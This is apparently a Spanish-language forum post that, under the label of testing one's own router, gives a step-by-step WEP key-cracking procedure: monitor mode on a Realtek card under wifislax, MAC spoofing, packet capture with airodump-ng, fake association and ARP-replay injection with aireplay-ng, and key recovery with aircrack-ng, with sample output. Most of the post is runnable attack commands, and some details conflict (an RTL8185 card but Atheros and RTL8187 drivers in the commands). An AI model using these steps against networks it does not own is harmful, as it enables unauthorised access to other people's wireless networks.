COMPROBANDO LA SEGURIDAD DE NUESTRO RUTEADOR
Utilizando la tarjeta de red RTL 8185 54M en modo monitor con la distribución de Linux wifislax 3.1, vamos a ver los pasos necesarios para asegurarnos de que tenemos seguro nuestro ruteador.
1.- DESCARGAMOS EL CONTROLADOR ADECUADO DESDE REALTEK:
Esta se encuentra en la siguiente ruta:
http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=1&PNid=1&PFid=1&Level=6&Conn=5&DownTypeID=3&GetDown=false&Downloads=true#RTL8185L Ahí puedes elegir cualquier servidor
ftp://66.104.77.130/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
ftp://152.104.238.19/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
ftp://61.56.69.18/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
NOTA: Guardamos el archivo descargado en la usb para posteriormente copiarlo en wifislax 3.1
2.- UNA VEZ REALIZADA LA DESCARGA PROCEDEMOS A DESCOMPRIMIR Y COMPILAR
#tar -xvf rtl8185_linux_26[1].1027.0823.2007.tar.gz
#cd rtl8185_linux_26.1027.0823.2007
#./makedrv
#./wlan0up
3.- AHORA PROBAMOS QUE REALMENTE YA ESTA LA TARJETA, SI ES EL CASO LO PONEMOS EN MODO MONITOR
#iwconfig
#ifconfig wlan0 down
#ifconfig wlan0 hw ether 11:22:33:44:55:66
#modprobe -r ath_pci
#modprobe ath_pci autocreate=monitor
#iwconfig wlan0 mode monitor
#iwconfig
4.- LO LEVANTAMOS
#ifconfig wlan0 up
5.- VAMOS A IDENTIFICAR NUESTRO RUTEADOR
#airodump-ng wlan0
Anotamos los datos mínimos necesarios tales como el ESSID,BSSID y MAC.
Ahora nos ubicamos adecuadamente en nuestro caso en rate 1 y canal 6
#iwconfig wlan0 rate 1M channel 6
6.- INICIAMOS AIRMON Y VERIFICAMOS QUE YA TENEMOS NUESTRA INTERFACE EN MODO MONITOR
#airmon-ng start wlan0
Vemos que nos da el siguiente resultado
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enabled)
7.- EMPEZAMOS A CAPTURAR TRAFICO CON AIRODUMP
#airodump-ng -w pas6 -c 6 wlan0
Seleccionamos el SSID (INFINITUMXXXX) y la direccion MAC(XX:XX:XX:XX:XX:XX) para verificar la seguridad de nuestro ruteador
Dejamos abierta la ventana y en ejecucion airodump
8.- CREAMOS UNA ASOCIACION AP CON AIREPLAY-NG
Abrimos un nuevo shell y tecleamos lo siguiente:
#aireplay-ng -1 0 -e INFINITUMXXXX -a XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0
En este punto vamos a intentarlo repetidamente hasta que obtengamos el mensaje:
Association successful :-)
9.- AHORA INYECTAMOS TRAFICO CON AIREPLAY
#aireplay-ng -3 -b XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0
Vemos que se empiezan a enviar y recibir paquetes
Y si checamos la ventana donde esta trabajando airodump se ve que se empiezan a generar los IV's, aqui esperamos hasta llegar unos 160,000 aproximandamente
10.- VAMOS A SACAR LA CLAVE CON AIRCRACK
Revisamos que este el archivo .cap en la ruta actual
#ls
#cd rtl8185_linux_26.1027.0823.2007 (el mio se quedo aquí)
#aircrack-ng pas6-01.cap
Seleccionamos el router : 1
INFINITUMXXXX
Y en unos instantes obtenemos el key:
KEY FOUND [34:67:34:65:75]
11.- INTRODUCIMOS LA CLAVE A NUESTRA TARJETA
Reiniciamos la PC, (porque despues aunque cambiemos el modo a managed no se conecta), volvemos a cargar los drivers (paso2)
Lo levantamos por si acaso
#ifconfi wlan0 up
y checamos con:
#iwconfig wlan0
Nos conectamos con nuestra clave (NO LA DEL VECINO) desde
1) wifislax-asistencia herramientas-wireless
wifislax wireles
Introducimos
la interface: wlan0
el ssid:INFINITUMXXXX
el canal:6
la clave:3467346575
2) wifislax-asistencia herramientas-wireless
asistencia redes
dhcp
#ifconfig wlan0
13.- POR ULTIMO VERIFICAMOS CON PING Y A NAVEGAR EN INTERNET
#ping
www.google.com.mx¿Alguien sabe como hacer para que se conecte inmediatemente sin reiniciar ... muchas gracias?
Autor
En línea
